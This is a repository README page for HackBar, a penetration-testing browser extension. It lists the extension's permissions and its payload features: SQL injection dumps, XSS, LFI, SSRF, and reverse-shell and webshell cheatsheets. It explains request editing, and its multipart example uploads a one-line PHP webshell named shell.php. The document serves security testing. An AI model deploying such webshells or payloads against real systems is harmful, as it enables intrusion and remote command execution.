• Stars
    star
    211
  • Rank 186,867 (Top 4 %)
  • Language Vue
  • Created over 6 years ago
  • Updated over 1 year ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

A browser extension for Penetration Testing

HackBar

A browser extension for Penetration Testing.

Available on Chrome Web Store and Firefox Add-ons.

Requested Permissions

  • storage

    • Save theme preferences
  • scripting

    • Perform POST request
    • Run test function
  • webRequest

    • Remember request information
    • Listen finish event to clean up
  • declarativeNetRequest

    • Set HTTP header value based on settings

Features

  • Load

    • From tab (default)
    • From cURL command
  • Supported

  • Auto Test

    • Common paths (Wordlist from dirsearch included)
  • SQLi

    • Dump all database names (MySQL, PostgreSQL)
    • Dump tables from database (MySQL, PostgreSQL, SQLite)
    • Dump columns from database (MySQL, PostgreSQL, SQLite)
    • Union select statement (MySQL, PostgreSQL, SQLite)
    • Error-based injection statement (MySQL, PostgreSQL)
    • Dump in one shot payload (MySQL)
    • Dump current query payload (MySQL)
    • Space to Inline comment
  • XSS

    • Vue.js XSS payloads
    • Angular.js XSS payloads for strict CSP
    • Some snippets for CTF
    • Html encode/decode with hex/dec/entity name
    • String.fromCharCode encode/decode
  • LFI

    • PHP wrapper - Base64
  • SSRF

    • AWS - IAM role name
  • SSTI

  • Shell

    • Python reverse shell cheatsheet
    • sh(bash) reverse shell cheatsheet
    • nc(ncat) reverse shell cheatsheet
    • PHP webshell/reverse shell cheatsheet
  • Encoding

    • URL encode/decode
    • Base64 encode/decode
    • Hexadecimal encode/decode
    • Unicode encode/decode
    • Escape ASCII with hex/oct
  • Hashing

    • MD5
    • SHA1
    • SHA256
    • SHA384
    • SHA512

Usage

How to open it?

  1. Open Developer tools (Press F12 or Ctrl + Shift + I)
  2. Switch to HackBar tab
  3. Enjoy it

Shortcuts

Description Shortcut
Load Alt + A
Split Alt + S
Execute Alt + X

Request Editing

Basic mode

multipart/form-data

After changing enctype field to multipart/form-data, you can put your payload into Body field such as the following:

------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="user"

user
------WebKitFormBoundarydbJBATDXCC6CL0lZ
Content-Disposition: form-data; name="file"; filename="shell.php"
Content-Type: application/x-httpd-php

<?php passthru($_GET['c']); ?>
------WebKitFormBoundarydbJBATDXCC6CL0lZ--

We will consider the first line as boundary, and reconstruct a form element to send your request.

Therefore, sent boundary will not be the same as you typed.

application/json

After changing enctype field to application/json, you can put your payload into Body field such as the following:

{
  "username": "admin",
  "password": "admin"
}

If your payload doesn't contain =:

In order to post JSON data, we will insert a dummy field or object to your JSON such as the following:

{ "username": "admin", "password": "admin", "4dxnzjzd5mi": "=" }

For more details, please visit "Posting JSON with an HTML Form".

Raw mode

This mode is implemented via fetch API. It will try the best to send a request as same as you typed.

However, there are some limitations:

Request

  • It is unable to use a specified HTTP protocol version.

    The protocol version is fixed to HTTP/1.1 in the editor, but what version used in a request is up to fetch behavior.

  • Some HTTP headers may appear in a sent request even if you don't add them in the editor.
    e.g. Connection, Cache-Control, Pragma, etc.

    These headers will be assigned a default value. For example, Connection: keep-alive, Cache-Control: no-cache.

Response

  • It always shows HTTP/1.1 if used protocol version is higher than or equal to HTTP/2.

    See also Chromium Code Search

Third-party Libraries

See package.json for details.

Contributor